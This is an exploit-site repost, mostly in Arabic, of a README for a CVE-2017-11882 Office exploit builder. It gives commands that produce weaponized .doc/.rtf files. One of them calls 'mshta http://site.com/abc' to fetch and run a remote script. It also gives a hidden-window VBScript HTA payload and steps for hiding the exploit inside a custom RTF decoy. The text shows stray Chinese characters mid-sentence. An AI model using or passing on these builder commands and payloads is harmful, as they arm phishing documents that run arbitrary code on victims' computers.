Sploitus

Exploit for CVE-2017-11882

kitploit · 2026-08-26

Exploit Code

MARKDOWN77 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TZWLHACK-CVE-2017-11882
# CVE-2017-11882

43b النص الأصلي مأخوذ من https://github.com/embedi/CVE-2017-11882

109b النص الأصلي مأخوذ من https://github.com/unamer/CVE-2017-11882/ (تحية، الآن كود unamer يمكنه تنفيذ shellcode ~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://vulners.com/cve/CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

## الاستخدام

root@kitploit:~
    
    
    python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
    

استخدام mshta

root@kitploit:~
    
    
    python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
    

abc

root@kitploit:~
    
    
    <HTML> 
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <HEAD> 
    <script language="VBScript">
    Window.ReSizeTo 0, 0
    Window.moveTo -2000,-2000
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc.exe"
    self.close
    </script>
    <body>
    demo
    </body>
    </HEAD> 
    </HTML> 
    
    

> لا يمكن أن يتجاوز طول الأمر 43 بايت لـ 43b، و109 بايت لـ 109b

# مثال استغلال لـ CVE-2017-11882 (بدء calc.exe كحمولة)

مجلد `example` يحتوي على ملف .rtf يستغل ثغرة CVE-2017-11882 ويقوم بتشغيل الحاسبة في النظام.

## حول المحتوى المخصص

في الحقيقة، تعلمت طريقة المحتوى المخصص من أساتذة آخرين، وقد كتبتها في script منذ فترة طويلة. لم أكن أنوي نشرها، ولكن بما أن أحدًا في المجموعة قد نشرها بالفعل، لم يكن لدي خيار سوى النشر. الطريقة بسيطة جدًا:只需要 افتح المستند العادي rtf في محرر نصوص، وانسخ كل المحتوى قبل {*\datastore}، واستبدل كل المحتوى قبل {\object\objautlink\objupdate}، ومن ثم تصبح كتابتها في script سهلة جدًا.

طريقة إضافة محتوى مخصص، اختر أي script:

root@kitploit:~
    
    
    python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf
    

المحتوى المخصص موجود في input.rtf.

أما script الاستغلال الأحدث بطول 605 بايت من unamer، فلن أقوم بتحديثه، يمكن لمن يريد تعديله بنفسه.